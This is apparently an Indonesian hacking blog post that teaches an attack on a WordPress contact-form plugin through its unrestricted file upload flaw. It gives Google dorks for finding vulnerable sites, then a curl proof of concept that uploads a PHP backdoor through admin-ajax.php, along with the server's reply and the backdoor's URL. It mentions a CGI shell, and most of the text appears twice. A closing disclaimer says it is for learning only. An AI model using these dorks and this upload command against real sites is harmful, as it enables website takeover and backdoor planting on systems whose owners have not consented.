Dork Google: index of website-contact-form-with-file-upload
index of /uploads/contact_files/
Bisa juga gunakan Plugin untuk mencari Dorknya om,
Ex: /plugins/website-contact-form-with-file-upload/ site:.com
Disini saya menggunakan CGI shell untuk Exploitasinya, Sebenarnya ini Exploit Cuma di OS Linux doank , tapi ini Bisa di remote kok santai aja =))
Cara penggunaanya sama Kayak Exploit Ninetofive Bisa dilihat disini mas bro
[ https://www.facebook.com/notes/dark-defence-cyber-team/how-to-remote-exploit-wordpress-ninetofive/1578809292394711 ]
Vulnerable: The "upload_file()" ajax function is affected from unrestircted file upload vulnerability.
# PoC:
curl -k -X POST -F "action=upload" -F "Filedata=@jiwa.php" -F "action=nm_webcontact_upload_file" http://VICTIM/wp-admin/admin-ajax.php
Result: {"status":"uploaded","filename":"1427927588-jiwa.php"}
# Backdoor Location:
http://VICTIM/wp-content/uploads/contact_files/1427927588-jiwa.php
index of /uploads/contact_files/
Bisa juga gunakan Plugin untuk mencari Dorknya om,
Ex: /plugins/website-contact-form-with-file-upload/ site:.com
Disini saya menggunakan CGI shell untuk Exploitasinya, Sebenarnya ini Exploit Cuma di OS Linux doank , tapi ini Bisa di remote kok santai aja =))
Cara penggunaanya sama Kayak Exploit Ninetofive Bisa dilihat disini mas bro
[ https://www.facebook.com/notes/dark-defence-cyber-team/how-to-remote-exploit-wordpress-ninetofive/1578809292394711 ]
Vulnerable: The "upload_file()" ajax function is affected from unrestircted file upload vulnerability.
# PoC:
curl -k -X POST -F "action=upload" -F "Filedata=@jiwa.php" -F "action=nm_webcontact_upload_file" http://VICTIM/wp-admin/admin-ajax.php
Result: {"status":"uploaded","filename":"1427927588-jiwa.php"}
# Backdoor Location:
http://VICTIM/wp-content/uploads/contact_files/1427927588-jiwa.php
Note:
Saya tidak bertanggung jawab tentang penyalah gunaan tutorial diatas sekedar untuk pembelajaran
thanks to: Slemanroot.net
Tidak ada komentar:
Posting Komentar